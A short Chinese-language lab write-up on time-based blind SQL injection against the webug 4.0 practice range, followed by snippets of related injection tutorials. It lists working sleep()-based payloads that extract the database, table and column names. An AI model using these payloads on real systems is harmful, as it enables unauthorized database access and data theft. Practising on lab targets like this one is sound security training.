通過之前的報錯可以得知sql語句
利用sleep()函式構造延時語句,發現頁面延遲響應
和布林注入一樣,通過觀察頁面狀態來猜測資料庫名、表名等資訊
爆當前資料庫名
if(ascii(substr(database(),1,1))>118,1,sleep(5))%23
如果大於118返回1,否則執行sleep(5)
爆出當前資料庫名webug
爆出webug下面的表
and if(ascii(substr((select table_name from information_schema.tables where table_schema=『webug』 limit 0,1),1,1))>99,1,sleep(5))%23
爆出webug下的表:data_crud,env_list,env_path,flag,sqlinjection,user,user_test
在布林關中知道flag在env_list下,直接爆env_list下的列
if(ascii(substr((select column_name from information_schema.columns where table_name=『env_list』 limit 0,1),1,1))>104,1,sleep(5))%23
env_list的表裡有:id,envname,envdesc,envintegration,delflag,envflag,level,type
爆flag
if(ascii(substr((select column_name from information_schema.columns where table_name=『env_list』 limit 0,1),1,1))>104,1,sleep(5))%23
webug4 0 顯錯注入
0x01 mysql資料相關知識 1.mysql三種注釋風格 單行注釋 sql語句後使用字元 或者 進行注釋 多行注釋 使用 將sql語句圈起來注釋 內聯注釋 內聯注釋是mysql資料庫為了保持與其他資料庫相容,特意新增的新功能。把mysql特有的語句放在 中 2.union聯合查詢 1.union...
webug4 0 寬位元組注入
在php mysql中,可以通過轉義特殊字元來防止汙染sql語句 防注入 有兩種情況 魔術引號,magic quote gpc 開關,不過高版本的php將去除這個特性 安全函式,addslashes,mysql real escape string,mysql escape string等。上有計策...
ACCESS延時注入
這也算是個新知識吧。今天遇到個站,實實在在存在注入,但是弄不出欄位。本應該可以用便宜注入。但是不知道為什麼就是就是弄不出來.payload select count from msysaccessobjects as t1,msysaccessobjects as t2,msysaccessobje...